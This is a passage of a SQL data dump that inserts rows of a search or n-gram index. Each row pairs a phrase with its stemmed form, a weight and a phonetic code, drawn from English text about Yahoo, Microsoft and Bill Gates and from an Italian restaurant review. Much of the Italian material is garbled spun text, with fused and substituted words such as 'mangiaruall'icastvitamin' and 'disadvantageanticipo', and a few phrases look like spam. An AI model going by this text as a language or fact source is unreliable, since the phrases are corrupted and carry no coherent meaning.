maker',0,1,1.6333,'U125631526',1,'en'),(42872,'up with','up with',0,1,1.2333,'U130',1,'en'),(42873,'up with a','up with a',0,1,1.3,'U130',1,'en'),(42874,'use for','us for',0,1,1.2333,'U216',1,'en'),(42875,'use its','us its',0,1,1.2333,'U232',1,'en'),(42876,'use its monopoly','us its monopoly',0,1,1.5333,'U232514',1,'en'),(42877,'used to make','us to make',0,1,1.4,'U2352',1,'en'),(42878,'value and','valu and',0,1,1.3,'V453',1,'en'),(42879,'value and he\'d','valu and he',0,1,1.4667,'V453',1,'en'),(42880,'via for','via for',0,1,1.2333,'V600',1,'en'),(42881,'via for ms','via for ms',0,1,1.3333,'V652',1,'en'),(42882,'via has','via has',0,1,1.2333,'V200',1,'en'),(42883,'via has to','via has to',0,1,1.3333,'V230',1,'en'),(42884,'via packets','via packets',0,1,1.3667,'V232',1,'en'),(42885,'via packets of','via packets of',0,1,1.4667,'V2321',1,'en'),(42886,'war','war',0,0,0.2,'W600',2,'en'),(42887,'war of','war of',0,1,1.2,'W610',1,'en'),(42888,'war of the','war of the',0,1,1.3333,'W613',1,'en'),(42889,'was forced','wa forced',0,1,1.3333,'W21623',1,'en'),(42890,'was forced out','wa forced out',0,1,1.4667,'W21623',1,'en'),(42891,'was more','wa more',0,1,1.2667,'W256',1,'en'),(42892,'was more of','wa more of',0,1,1.3667,'W2561',1,'en'),(42893,'was not able','wa not able',0,1,1.4,'W25314',1,'en'),(42894,'was ousted','wa ousted',0,1,1.3333,'W230',1,'en'),(42895,'was ousted asceo','wa ousted asceo',0,1,1.5333,'W232',1,'en'),(42896,'was part','wa part',0,1,1.2667,'W2163',1,'en'),(42897,'was part of','wa part of',0,1,1.3667,'W21631',1,'en'),(42898,'was prepared','wa prepared',0,1,1.4,'W216163',1,'en'),(42899,'was prepared to','wa prepared to',0,1,1.5,'W216163',1,'en'),(42900,'was under','wa under',0,1,1.3,'W2536',1,'en'),(42901,'was under his','wa under his',0,1,1.4333,'W25362',1,'en'),(42902,'was windows','wa windows',0,1,1.3667,'W2532',1,'en'),(42903,'was windows chief','wa windows chief',0,1,1.5667,'W25321',1,'en'),(42904,'watch free','watch free',0,1,1.3333,'W3216',1,'en'),(42905,'watch free movies','watch free movies',0,1,1.5667,'W3216512',1,'en'),(42906,'watch that','watch that',0,1,1.3333,'W323',2,'en'),(42907,'watch that earth\'s','watch that earth',0,1,1.6,'W323632',1,'en'),(42908,'watched','watch',0,0,0.4667,'W323',1,'en'),(42909,'watched it','watch it',0,1,1.3333,'W323',1,'en'),(42910,'watched it grow','watch it grow',0,1,1.5,'W32326',1,'en'),(42911,'way in','wai in',0,1,1.2,'W500',1,'en'),(42912,'way in 1975','wai in 1975',0,1,1.3667,'W500',1,'en'),(42913,'way people','wai people',0,1,1.3333,'W140',1,'en'),(42914,'way people communicate','wai people communicate',0,1,1.7333,'W142523',1,'en'),(42915,'web advertising','web advertising',0,1,1.5,'W13163252',1,'en'),(42916,'web advertising to','web advertising to',0,1,1.6,'W131632523',1,'en'),(42917,'web browser','web browser',0,1,1.3667,'W1626',1,'en'),(42918,'web browser war','web browser war',0,1,1.5,'W1626',1,'en'),(42919,'welcome','welcom',0,0,0.4667,'W425',1,'en'),(42920,'welcome referred','welcom referred',0,1,1.5333,'W4256163',1,'en'),(42921,'welcome referred to','welcom referred to',0,1,1.6333,'W4256163',1,'en'),(42922,'wellesley','welleslei',0,0,0.6,'W424',1,'en'),(42923,'wellesley boston','welleslei boston',0,1,1.5333,'W4241235',1,'en'),(42924,'wellesley boston and','welleslei boston and',0,1,1.6667,'W42412353',1,'en'),(42925,'went back','went back',0,1,1.3,'W5312',1,'en'),(42926,'went back he','went back he',0,1,1.4,'W5312',1,'en'),(42927,'were an','were an',0,1,1.2333,'W650',1,'en'),(42928,'were an appliance','were an appliance',0,1,1.5667,'W651452',1,'en'),(42929,'were mostly','were mostly',0,1,1.3667,'W65234',1,'en'),(42930,'were mostly pcs','were mostly pcs',0,1,1.5,'W6523412',1,'en'),(42931,'were released','were released',0,1,1.4333,'W6423',1,'en'),(42932,'were released in','were released in',0,1,1.5333,'W64235',1,'en'),(42933,'what can','what can',0,1,1.2667,'W325',1,'en'),(42934,'what can happen','what can happen',0,1,1.5,'W32515',1,'en'),(42935,'what he calls','what he calls',0,1,1.4333,'W3242',1,'en'),(42936,'what schultz','what schultz',0,1,1.4,'W32432',1,'en'),(42937,'what schultz did','what schultz did',0,1,1.5333,'W324323',1,'en'),(42938,'what they','what they',0,1,1.3,'W300',1,'en'),(42939,'what they created','what they created',0,1,1.5667,'W3263',1,'en'),(42940,'what to','what to',0,1,1.2333,'W300',1,'en'),(42941,'what to do','what to do',0,1,1.3333,'W300',1,'en'),(42942,'what\'s','what',0,0,0.4,'W320',2,'en'),(42943,'what\'s needed','what needed',0,1,1.4333,'W3253',2,'en'),(42944,'what\'s needed to','what needed to',0,1,1.5333,'W3253',1,'en'),(42945,'when a','when a',0,1,1.2,'W500',1,'en'),(42946,'when a founder','when a founder',0,1,1.4667,'W51536',1,'en'),(42947,'when entrance','when entrance',0,1,1.4333,'W53652',1,'en'),(42948,'when entrance left','when entrance left',0,1,1.6,'W53652413',1,'en'),(42949,'when he went','when he went',0,1,1.4,'W530',1,'en'),(42950,'which at','which at',0,1,1.2667,'W230',1,'en'),(42951,'which at this','which at this',0,1,1.4333,'W232',1,'en'),(42952,'while new','while new',0,1,1.3,'W450',1,'en'),(42953,'while new microsoft','while new microsoft',0,1,1.6333,'W4526213',1,'en'),(42954,'who has predicted','who has predicted',0,1,1.5667,'W216323',1,'en'),(42955,'who returns','who returns',0,1,1.3667,'W63652',1,'en'),(42956,'who returns to','who returns to',0,1,1.4667,'W636523',1,'en'),(42957,'who saw','who saw',0,1,1.2333,'W200',1,'en'),(42958,'who saw the','who saw the',0,1,1.3667,'W230',1,'en'),(42959,'who should','who should',0,1,1.3333,'W243',1,'en'),(42960,'who should have','who should have',0,1,1.5,'W2431',1,'en'),(42961,'who threw','who threw',0,1,1.3,'W360',1,'en'),(42962,'who threw their','who threw their',0,1,1.5,'W3636',1,'en'),(42963,'wide web','wide web',0,1,1.2667,'W310',1,'en'),(42964,'wide web advertising','wide web advertising',0,1,1.6667,'W313163252',1,'en'),(42965,'will be a','will be a',0,1,1.3,'W410',1,'en'),(42966,'will be protesting','will be protesting',0,1,1.6,'W41632352',1,'en'),(42967,'will help it','will help it',0,1,1.4,'W413',1,'en'),(42968,'will occupy','will occupy',0,1,1.3667,'W421',1,'en'),(42969,'will occupy the','will occupy the',0,1,1.5,'W4213',1,'en'),(42970,'will stay','will stay',0,1,1.3,'W423',1,'en'),(42971,'will stay with','will stay with',0,1,1.4667,'W423',1,'en'),(42972,'wilson\'s','wilson',0,0,0.5333,'W4252',1,'en'),(42973,'wilson\'s kept','wilson kept',0,1,1.4333,'W425213',1,'en'),(42974,'wilson\'s kept as','wilson kept as',0,1,1.5333,'W4252132',1,'en'),(42975,'win the web','win the web',0,1,1.3667,'W531',1,'en'),(42976,'windows and','window and',0,1,1.3667,'W53253',1,'en'),(42977,'windows and office','window and office',0,1,1.6,'W5325312',1,'en'),(42978,'windows chief','window chief',0,1,1.4333,'W5321',1,'en'),(42979,'windows chief software','window chief software',0,1,1.7333,'W53212136',1,'en'),(42980,'windows to','window to',0,1,1.3333,'W5323',1,'en'),(42981,'windows to win','window to win',0,1,1.4667,'W53235',1,'en'),(42982,'with a structure','with a structure',0,1,1.5333,'W3236236',1,'en'),(42983,'with a takeover','with a takeover',0,1,1.5,'W3216',1,'en'),(42984,'with a via','with a via',0,1,1.3333,'W310',1,'en'),(42985,'with david','with david',0,1,1.3333,'W313',1,'en'),(42986,'with david filo','with david filo',0,1,1.5,'W31314',1,'en'),(42987,'with google','with google',0,1,1.3667,'W324',1,'en'),(42988,'with google in','with google in',0,1,1.4667,'W3245',1,'en'),(42989,'with sort','with sort',0,1,1.3,'W3263',1,'en'),(42990,'with sort of','with sort of',0,1,1.4,'W32631',1,'en'),(42991,'with the devices','with the devices',0,1,1.5333,'W312',1,'en'),(42992,'with via','with via',0,1,1.2667,'W310',1,'en'),(42993,'with windows','with windows',0,1,1.4,'W3532',1,'en'),(42994,'with windows to','with windows to',0,1,1.5,'W35323',1,'en'),(42995,'with you while','with you while',0,1,1.4667,'W340',1,'en'),(42996,'work part','work part',0,1,1.3,'W62163',1,'en'),(42997,'work part time','work part time',0,1,1.4667,'W621635',1,'en'),(42998,'work will','work will',0,1,1.3,'W624',1,'en'),(42999,'work will occupy','work will occupy',0,1,1.5333,'W62421',1,'en'),(43000,'world wide','world wide',0,1,1.3333,'W643',1,'en'),(43001,'world wide web','world wide web',0,1,1.4667,'W6431',1,'en'),(43002,'world\'s','world',0,0,0.4667,'W6432',1,'en'),(43003,'world\'s most','world most',0,1,1.4,'W6432523',1,'en'),(43004,'world\'s most effective','world most effective',0,1,1.7333,'W64325231231',1,'en'),(43005,'write testimonials','write testimonials',0,1,1.6,'W6323542',1,'en'),(43006,'write testimonials and','write testimonials and',0,1,1.7333,'W632354253',1,'en'),(43007,'yahoo','yahoo',0,0,0.3333,'Y000',1,'en'),(43008,'yahoo corporation','yahoo corporation',0,1,1.5667,'Y261635',1,'en'),(43009,'yahoo corporation is','yahoo corporation is',0,1,1.6667,'Y2616352',1,'en'),(43010,'yahoo with','yahoo with',0,1,1.3333,'Y300',1,'en'),(43011,'yahoo with david','yahoo with david',0,1,1.5333,'Y313',1,'en'),(43012,'yang','yang',0,0,0.2667,'Y520',1,'en'),(43013,'yang started','yang started',0,1,1.4,'Y52363',1,'en'),(43014,'yang started yahoo','yang started yahoo',0,1,1.6,'Y52363',1,'en'),(43015,'yang\'s','yang',0,0,0.4,'Y520',1,'en'),(43016,'yang\'s training','yang training',0,1,1.5,'Y523652',1,'en'),(43017,'yang\'s training at','yang training at',0,1,1.6,'Y5236523',1,'en'),(43018,'year absence','year absence',0,1,1.4,'Y61252',1,'en'),(43019,'year absence as','year absence as',0,1,1.5,'Y61252',1,'en'),(43020,'year and','year and',0,1,1.2667,'Y653',2,'en'),(43021,'year and he','year and he',0,1,1.3667,'Y653',1,'en'),(43022,'year chip','year chip',0,1,1.3,'Y621',1,'en'),(43023,'year chip wilson\'s','year chip wilson',0,1,1.6,'Y6214252',1,'en'),(43024,'year old co','year old co',0,1,1.3667,'Y6432',1,'en'),(43025,'years dell','year dell',0,1,1.3333,'Y6234',1,'en'),(43026,'years dell is','year dell is',0,1,1.4333,'Y62342',1,'en'),(43027,'years gates','year gates',0,1,1.3667,'Y6232',1,'en'),(43028,'years gates will','year gates will',0,1,1.5333,'Y62324',1,'en'),(43029,'years later','year later',0,1,1.3667,'Y62436',1,'en'),(43030,'years later after','year later after',0,1,1.5667,'Y62436136',1,'en'),(43031,'yet for','yet for',0,1,1.2333,'Y316',1,'en'),(43032,'yet for each','yet for each',0,1,1.4,'Y3162',1,'en'),(43033,'you while','you while',0,1,1.3,'Y400',1,'en'),(43034,'you while new','you while new',0,1,1.4333,'Y450',1,'en'),(43035,'a pranzo','a pranzo',0,1,1.2667,'A1652',1,'en'),(43036,'a pranzo ci','a pranzo ci',0,1,1.3667,'A1652',1,'en'),(43037,'a.grande','a.grand',0,0,0.5333,'A2653',1,'en'),(43038,'a.grande é','a.grand é',0,1,1.3333,'A2653',1,'en'),(43039,'a.grande é bellissima','a.grand é bellissima',0,1,1.7,'A26531425',1,'en'),(43040,'are generally sal','ar generally sal',0,1,1.5667,'A6256424',1,'en'),(43041,'bar','bar',0,0,0.2,'B600',1,'en'),(43042,'bar newyorkese','bar newyorkese',0,1,1.4667,'B6562',1,'en'),(43043,'bar newyorkese i','bar newyorkese i',0,1,1.5333,'B6562',1,'en'),(43044,'batlli','batlli',0,0,0.4,'B340',1,'en'),(43045,'batlli ica','batlli ica',0,1,1.3333,'B342',1,'en'),(43046,'batlli ica comodi','batlli ica comodi',0,1,1.5667,'B34253',1,'en'),(43047,'battuto','battuto',0,0,0.4667,'B300',1,'en'),(43048,'battuto the','battuto the',0,1,1.3667,'B300',1,'en'),(43049,'battuto the raffinate','battuto the raffinate',0,1,1.7,'B36153',1,'en'),(43050,'bellissima','bellissima',0,0,0.6667,'B425',1,'en'),(43051,'bellissima e','bellissima e',0,1,1.4,'B425',1,'en'),(43052,'bellissima e comodissimi','bellissima e comodissimi',0,1,1.8,'B42525325',1,'en'),(43053,'bianchi','bianchi',0,0,0.4667,'B520',1,'en'),(43054,'bianchi e','bianchi e',0,1,1.3,'B520',1,'en'),(43055,'bianchi e le','bianchi e le',0,1,1.4,'B524',1,'en'),(43056,'blvd','blvd',0,0,0.2667,'B413',1,'en'),(43057,'blvd saint','blvd saint',0,1,1.3333,'B413253',1,'en'),(43058,'blvd saint germain','blvd saint germain',0,1,1.6,'B413253265',1,'en'),(43059,'borsat','borsat',0,0,0.4,'B623',1,'en'),(43060,'bravo','bravo',0,0,0.3333,'B610',1,'en'),(43061,'bravo rob','bravo rob',0,1,1.3,'B6161',1,'en'),(43062,'bravo rob laurent','bravo rob laurent',0,1,1.5667,'B61614653',1,'en'),(43063,'buonall','buonal',0,0,0.4667,'B540',1,'en'),(43064,'buonall of','buonal of',0,1,1.3333,'B541',1,'en'),(43065,'buonall of usas','buonal of usas',0,1,1.5,'B5412',1,'en'),(43066,'burger','burger',0,0,0.4,'B626',1,'en'),(43067,'burger in','burger in',0,1,1.3,'B6265',1,'en'),(43068,'burger in involucri','burger in involucri',0,1,1.6333,'B62651426',1,'en'),(43069,'c\'è una','c una',0,1,1.2333,'C500',1,'en'),(43070,'c\'è una lungaattesa','c una lungaattesa',0,1,1.6333,'C545232',1,'en'),(43071,'c\'é united','c united',0,1,1.3333,'C530',1,'en'),(43072,'c\'é united nations','c united nations',0,1,1.6,'C535352',1,'en'),(43073,'caffe\'','caff',0,0,0.4,'C100',1,'en'),(43074,'caffe\' premium','caff premium',0,1,1.4667,'C165',1,'en'),(43075,'caffe\' premium coffee','caff premium coffee',0,1,1.7,'C16521',1,'en'),(43076,'camino','camino',0,0,0.4,'C500',1,'en'),(43077,'camino spettacolare','camino spettacolare',0,1,1.6333,'C5213246',1,'en'),(43078,'camino spettacolare lampadariall','camino spettacolare lampadariall',0,1,2,'C5213246451364',1,'en'),(43079,'caramellati','caramellati',0,0,0.7333,'C6543',1,'en'),(43080,'caramellati per','caramellati per',0,1,1.5,'C654316',1,'en'),(43081,'caramellati per finire','caramellati per finire',0,1,1.7333,'C654316156',1,'en'),(43082,'carta','carta',0,0,0.3333,'C630',1,'en'),(43083,'carta dei','carta dei',0,1,1.3,'C630',1,'en'),(43084,'carta dei vini','carta dei vini',0,1,1.4667,'C6315',1,'en'),(43085,'certamente','certament',0,0,0.6667,'C6353',1,'en'),(43086,'certamente un','certament un',0,1,1.4333,'C63535',1,'en'),(43087,'certamente un navigation','certament un navigation',0,1,1.8,'C635351235',1,'en'),(43088,'che sa','che sa',0,1,1.2,'C000',1,'en'),(43089,'che sa racchiudere','che sa racchiudere',0,1,1.6,'C6236',1,'en'),(43090,'ci sono dicai','ci sono dicai',0,1,1.4333,'C532',1,'en'),(43091,'ci sono tavoliall\'apatrtoat','ci sono tavoliall',0,1,1.9,'C53141363',1,'en'),(43092,'cibo','cibo',0,0,0.2667,'C100',1,'en'),(43093,'cibo e\'','cibo e',0,1,1.2333,'C100',1,'en'),(43094,'cibo e\' presentato','cibo e presentato',0,1,1.6,'C16253',1,'en'),(43095,'classe','class',0,0,0.4,'C420',1,'en'),(43096,'classe ma','class ma',0,1,1.3,'C425',1,'en'),(43097,'classe ma piuttosto','class ma piuttosto',0,1,1.6333,'C4251323',1,'en'),(43098,'coffee con','coffe con',0,1,1.3333,'C125',1,'en'),(43099,'coffee con pop','coffe con pop',0,1,1.4667,'C1251',1,'en'),(43100,'comodi e\'','comodi e',0,1,1.3,'C530',1,'en'),(43101,'comodi e\' raffinato','comodi e raffinato',0,1,1.6333,'C536153',1,'en'),(43102,'comodissimi','comodissimi',0,0,0.7333,'C5325',1,'en'),(43103,'comodissimi i','comodissimi i',0,1,1.4333,'C5325',1,'en'),(43104,'comodissimi i divani','comodissimi i divani',0,1,1.6667,'C5325315',1,'en'),(43105,'compilation','compil',0,0,0.7333,'C51435',1,'en'),(43106,'compilation non','compil non',0,1,1.5,'C51435',1,'en'),(43107,'compilation non é','compil non é',0,1,1.5667,'C51435',1,'en'),(43108,'con pop','con pop',0,1,1.2333,'C510',1,'en'),(43109,'con pop corn','con pop corn',0,1,1.4,'C51265',1,'en'),(43110,'con quell\'eleganza','con quell',0,1,1.6,'C524252',1,'en'),(43111,'con quell\'eleganza che','con quell che',0,1,1.7333,'C524252',1,'en'),(43112,'consiglio','consiglio',0,0,0.6,'C524',1,'en'),(43113,'consiglio di','consiglio di',0,1,1.4,'C5243',1,'en'),(43114,'consiglio di mangiaruall\'icastvitamin','consiglio di mangiaruall',0,1,2,'C5243526423135',1,'en'),(43115,'corn','corn',0,0,0.2667,'C650',1,'en'),(43116,'corn caramellati','corn caramellati',0,1,1.5333,'C6526543',1,'en'),(43117,'corn caramellati per','corn caramellati per',0,1,1.6667,'C652654316',1,'en'),(43118,'cucina','cucina',0,0,0.4,'C500',1,'en'),(43119,'cucina il','cucina il',0,1,1.3,'C540',1,'en'),(43120,'cucina il personathe','cucina il personathe',0,1,1.6667,'C5416253',1,'en'),(43121,'cucina manufactured','cucina manufactured',0,1,1.6333,'C512363',1,'en'),(43122,'cucina manufactured ralph','cucina manufactured ralph',0,1,1.8333,'C512363641',1,'en'),(43123,'cucina produced','cucina produced',0,1,1.5,'C516323',1,'en'),(43124,'cucina produced in','cucina produced in',0,1,1.6,'C5163235',1,'en'),(43125,'da ristorante','da ristorante',0,1,1.4333,'D623653',1,'en'),(43126,'da ristorante di','da ristorante di',0,1,1.5333,'D623653',1,'en'),(43127,'da sembrarealta','da sembrarealta',0,1,1.5,'D251643',1,'en'),(43128,'da sembrarealta cucina','da sembrarealta cucina',0,1,1.7333,'D25164325',1,'en'),(43129,'davveroarredato','davveroarredato',0,0,1,'D163',1,'en'),(43130,'davveroarredato in','davveroarredato in',0,1,1.6,'D1635',1,'en'),(43131,'davveroarredato in the','davveroarredato in the',0,1,1.7333,'D16353',1,'en'),(43132,'dei vini','dei vini',0,1,1.2667,'D150',1,'en'),(43133,'dei vini caffe\'','dei vini caffe',0,1,1.5,'D1521',1,'en'),(43134,'di burger','di burger',0,1,1.3,'D1626',1,'en'),(43135,'di burger in','di burger in',0,1,1.4,'D16265',1,'en'),(43136,'di classe','di classe',0,1,1.3,'D242',1,'en'),(43137,'di classe ma','di classe ma',0,1,1.4,'D2425',1,'en'),(43138,'di mangiaruall\'icastvitamin','di mangiaruall',0,1,1.9,'D526423135',1,'en'),(43139,'di mangiaruall\'icastvitamin yrno','di mangiaruall yrno',0,1,2,'D52642313565',1,'en'),(43140,'di un','di un',0,1,1.1667,'D500',1,'en'),(43141,'di un bar','di un bar',0,1,1.3,'D516',1,'en'),(43142,'di varie','di varie',0,1,1.2667,'D160',1,'en'),(43143,'di varie nazionalità','di varie nazionalità',0,1,1.6667,'D1652543',1,'en'),(43144,'dicai','dicai',0,0,0.3333,'D200',1,'en'),(43145,'dicai divani','dicai divani',0,1,1.4,'D2315',1,'en'),(43146,'dicai divani molto','dicai divani molto',0,1,1.6,'D231543',1,'en'),(43147,'disadvantageanticipo','disadvantageanticipo',0,0,1,'D2315325321',1,'en'),(43148,'disadvantageanticipo xchè','disadvantageanticipo xchè',0,1,1.8333,'D23153253212',1,'en'),(43149,'disadvantageanticipo xchè c\'è','disadvantageanticipo xchè c',0,1,1.9667,'D23153253212',1,'en'),(43150,'discreta','discreta',0,0,0.5333,'D263',1,'en'),(43151,'discreta carta','discreta carta',0,1,1.4667,'D263263',1,'en'),(43152,'discreta carta dei','discreta carta dei',0,1,1.6,'D263263',1,'en'),(43153,'divani','divani',0,0,0.4,'D150',1,'en'),(43154,'divani molto','divani molto',0,1,1.4,'D1543',1,'en'),(43155,'divani molto batlli','divani molto batlli',0,1,1.6333,'D1543134',1,'en'),(43156,'divani nella','divani nella',0,1,1.4,'D154',1,'en'),(43157,'divani nella sala','divani nella sala',0,1,1.5667,'D15424',1,'en'),(43158,'diversi','diversi',0,0,0.4667,'D162',1,'en'),(43159,'diversi tipi','diversi tipi',0,1,1.4,'D16231',1,'en'),(43160,'diversi tipi di','diversi tipi di',0,1,1.5,'D162313',1,'en'),(43161,'dolcall','dolcal',0,0,0.4667,'D424',1,'en'),(43162,'dolcall of','dolcal of',0,1,1.3333,'D4241',1,'en'),(43163,'dolcall of us','dolcal of us',0,1,1.4333,'D42412',1,'en'),(43164,'dovete','dovet',0,0,0.4,'D130',1,'en'),(43165,'dovete prenotare','dovet prenotare',0,1,1.5333,'D1316536',1,'en'),(43166,'dovete prenotare disadvantageanticipo','dovet prenotare disadvantageanticipo',0,1,2,'D131653632315325321',1,'en'),(43167,'é bellissima','é bellissima',0,1,1.4,'é1425',1,'en'),(43168,'é bellissima e','é bellissima e',0,1,1.4667,'é1425',1,'en'),(43169,'é certamente','é certamente',0,1,1.4,'é26353',1,'en'),(43170,'é certamente un','é certamente un',0,1,1.5,'é263535',1,'en'),(43171,'e comodissimi','e comodissimi',0,1,1.4333,'E25325',1,'en'),(43172,'e comodissimi i','e comodissimi i',0,1,1.5,'E25325',1,'en'),(43173,'è davveroarredato','è davveroarredato',0,1,1.5667,'è3163',1,'en'),(43174,'è davveroarredato in','è davveroarredato in',0,1,1.6667,'è31635',1,'en'),(43175,'e le','e le',0,1,1.1333,'E400',1,'en'),(43176,'e le sedie','e le sedie',0,1,1.3333,'E423',1,'en'),(43177,'e monogrammate','e monogrammate',0,1,1.4667,'E52653',1,'en'),(43178,'e monogrammate il','e monogrammate il',0,1,1.5667,'E526534',1,'en'),(43179,'e quadri','e quadri',0,1,1.2667,'E236',1,'en'),(43180,'e quadri moltoaroundteressanti','e quadri moltoaroundteressanti',0,1,2,'E2365436536253',1,'en'),(43181,'e\'','e',0,0,0.1333,'E000',1,'en'),(43182,'e\' presentato','e presentato',0,1,1.4333,'E16253',1,'en'),(43183,'e\' presentato con','e presentato con',0,1,1.5667,'E1625325',1,'en'),(43184,'e\' raffinato','e raffinato',0,1,1.4,'E6153',1,'en'),(43185,'e\' raffinato scam','e raffinato scam',0,1,1.5667,'E615325',1,'en'),(43186,'eattento','eattento',0,0,0.5333,'E353',1,'en'),(43187,'eattento di','eattento di',0,1,1.3667,'E353',1,'en'),(43188,'eattento di varie','eattento di varie',0,1,1.5667,'E35316',1,'en'),(43189,'elegante','elegant',0,0,0.5333,'E4253',1,'en'),(43190,'elegante blvd','elegant blvd',0,1,1.4333,'E42531413',1,'en'),(43191,'elegante blvd saint','elegant blvd saint',0,1,1.6333,'E42531413253',1,'en'),(43192,'esigenza','esigenza',0,0,0.5333,'E252',1,'en'),(43193,'esigenza in','esigenza in',0,1,1.3667,'E2525',1,'en'),(43194,'esigenza in tutte','esigenza in tutte',0,1,1.5667,'E25253',1,'en'),(43195,'ferro','ferro',0,0,0.3333,'F600',1,'en'),(43196,'ferro battuto','ferro battuto',0,1,1.4333,'F613',1,'en'),(43197,'ferro battuto the','ferro battuto the',0,1,1.5667,'F613',1,'en'),(43198,'finire','finir',0,0,0.4,'F560',1,'en'),(43199,'finire bravo','finir bravo',0,1,1.4,'F56161',1,'en'),(43200,'finire bravo rob','finir bravo rob',0,1,1.5333,'F5616161',1,'en'),(43201,'generally sal','gener sal',0,1,1.4333,'G56424',1,'en'),(43202,'generally sal a.grande','gener sal a.grande',0,1,1.7333,'G564242653',1,'en'),(43203,'germain','germain',0,0,0.4667,'G650',1,'en'),(43204,'germain è','germain è',0,1,1.3,'G650',1,'en'),(43205,'germain è davveroarredato','germain è davveroarredato',0,1,1.8333,'G653163',1,'en'),(43206,'giardino','giardino',0,0,0.5333,'G635',1,'en'),(43207,'giardino ci','giardino ci',0,1,1.3667,'G6352',1,'en'),(43208,'giardino ci sono','giardino ci sono',0,1,1.5333,'G63525',1,'en'),(43209,'giovane','giovan',0,0,0.4667,'G150',1,'en'),(43210,'giovane eattento','giovan eattento',0,1,1.5333,'G15353',1,'en'),(43211,'giovane eattento di','giovan eattento di',0,1,1.6333,'G15353',1,'en'),(43212,'i divani','i divani',0,1,1.2667,'I315',1,'en'),(43213,'i divani nella','i divani nella',0,1,1.4667,'I3154',1,'en'),(43214,'i diversi','i diversi',0,1,1.3,'I3162',1,'en'),(43215,'i diversi tipi','i diversi tipi',0,1,1.4667,'I316231',1,'en'),(43216,'i prezzi','i prezzi',0,1,1.2667,'I162',1,'en'),(43217,'i prezzi no','i prezzi no',0,1,1.3667,'I1625',1,'en'),(43218,'i suoi','i suoi',0,1,1.2,'I200',1,'en'),(43219,'i suoi ombrelloni','i suoi ombrelloni',0,1,1.5667,'I251645',1,'en'),(43220,'ica','ica',0,0,0.2,'I200',1,'en'),(43221,'ica comodi','ica comodi',0,1,1.3333,'I253',1,'en'),(43222,'ica comodi e\'','ica comodi e',0,1,1.4333,'I253',1,'en'),(43223,'il cibo','il cibo',0,1,1.2333,'I421',1,'en'),(43224,'il cibo e\'','il cibo e',0,1,1.3333,'I421',1,'en'),(43225,'il compilation','il compilation',0,1,1.4667,'I4251435',1,'en'),(43226,'il compilation non','il compilation non',0,1,1.6,'I4251435',1,'en'),(43227,'il personathe','il personathe',0,1,1.4333,'I416253',1,'en'),(43228,'il personathe giovane','il personathe giovane',0,1,1.7,'I416253215',1,'en'),(43229,'il ristorante','il ristorante',0,1,1.4333,'I4623653',1,'en'),(43230,'il ristorante si','il ristorante si',0,1,1.5333,'I46236532',1,'en'),(43231,'in ferro','in ferro',0,1,1.2667,'I516',1,'en'),(43232,'in ferro battuto','in ferro battuto',0,1,1.5333,'I51613',1,'en'),(43233,'in involucri','in involucri',0,1,1.4,'I51426',1,'en'),(43234,'in involucri da','in involucri da',0,1,1.5,'I514263',1,'en'),(43235,'in stile','in stile',0,1,1.2667,'I5234',1,'en'),(43236,'in stile polo','in stile polo',0,1,1.4333,'I523414',1,'en'),(43237,'in the modo','in the modo',0,1,1.3667,'I5353',1,'en'),(43238,'in tutte the','in tutte the',0,1,1.4,'I530',1,'en'),(43239,'in usa','in usa',0,1,1.2,'I520',1,'en'),(43240,'in usa il','in usa il',0,1,1.3,'I524',1,'en'),(43241,'in usa in','in usa in',0,1,1.3,'I525',1,'en'),(43242,'intonate','inton',0,0,0.5333,'I5353',1,'en'),(43243,'intonate e','inton e',0,1,1.3333,'I5353',1,'en'),(43244,'intonate e monogrammate','inton e monogrammate',0,1,1.7667,'I535352653',1,'en'),(43245,'involucri','involucri',0,0,0.6,'I51426',1,'en'),(43246,'involucri da','involucri da',0,1,1.4,'I514263',1,'en'),(43247,'involucri da sembrarealta','involucri da sembrarealta',0,1,1.8333,'I514263251643',1,'en'),(43248,'italia consiglio','italia consiglio',0,1,1.5333,'I342524',1,'en'),(43249,'italia consiglio di','italia consiglio di',0,1,1.6333,'I3425243',1,'en'),(43250,'italia in','italia in',0,1,1.3,'I345',1,'en'),(43251,'italia in usa','italia in usa',0,1,1.4333,'I3452',1,'en'),(43252,'lampadariall','lampadarial',0,0,0.8,'L51364',1,'en'),(43253,'lampadariall the','lampadarial the',0,1,1.5333,'L513643',1,'en'),(43254,'lampadariall the way','lampadarial the way',0,1,1.6667,'L513643',1,'en'),(43255,'lauren cucina','lauren cucina',0,1,1.4333,'L6525',1,'en'),(43256,'lauren cucina manufactured','lauren cucina manufactured',0,1,1.8667,'L652512363',1,'en'),(43257,'lauren cucina produced','lauren cucina produced',0,1,1.7333,'L652516323',1,'en'),(43258,'lauren italia in','lauren italia in',0,1,1.5333,'L65345',1,'en'),(43259,'le sedie','le sedie',0,1,1.2667,'L230',1,'en'),(43260,'le sedie in','le sedie in',0,1,1.3667,'L235',1,'en'),(43261,'line trading','line trading',0,1,1.4,'L536352',1,'en'),(43262,'line trading system','line trading system',0,1,1.6333,'L53635235',1,'en'),(43263,'lingue','lingu',0,0,0.4,'L520',1,'en'),(43264,'lingue buonall','lingu buonall',0,1,1.4667,'L52154',1,'en'),(43265,'lingue buonall of','lingu buonall of',0,1,1.5667,'L521541',1,'en'),(43266,'lungaattesa','lungaattesa',0,0,0.7333,'L5232',1,'en'),(43267,'lungaattesa a','lungaattesa a',0,1,1.4333,'L5232',1,'en'),(43268,'lungaattesa a pranzo','lungaattesa a pranzo',0,1,1.6667,'L52321652',1,'en'),(43269,'ma piuttosto','ma piuttosto',0,1,1.4,'M1323',1,'en'),(43270,'ma piuttosto di','ma piuttosto di',0,1,1.5,'M1323',1,'en'),(43271,'mangiaruall\'icastvitamin','mangiarual',0,0,1,'M26423135',1,'en'),(43272,'mangiaruall\'icastvitamin yrno','mangiarual yrno',0,1,1.9667,'M2642313565',1,'en'),(43273,'mangiaruall\'icastvitamin yrno nelectronicl','mangiarual yrno nelectronicl',0,1,2,'M26423135654236524',1,'en'),(43274,'manufactured ralph','manufactur ralph',0,1,1.6,'M12363641',1,'en'),(43275,'manufactured ralph lauren','manufactur ralph lauren',0,1,1.8333,'M12363641465',1,'en'),(43276,'modesti','modesti',0,0,0.4667,'M323',1,'en'),(43277,'modesti dovete','modesti dovete',0,1,1.4667,'M32313',1,'en'),(43278,'modesti dovete prenotare','modesti dovete prenotare',0,1,1.8,'M3231316536',1,'en'),(43279,'modo','modo',0,0,0.2667,'M300',1,'en'),(43280,'modo spettacolare','modo spettacolare',0,1,1.5667,'M3213246',1,'en'),(43281,'modo spettacolare are','modo spettacolare are',0,1,1.7,'M3213246',1,'en'),(43282,'molto batlli','molto batlli',0,1,1.4,'M43134',1,'en'),(43283,'molto batlli 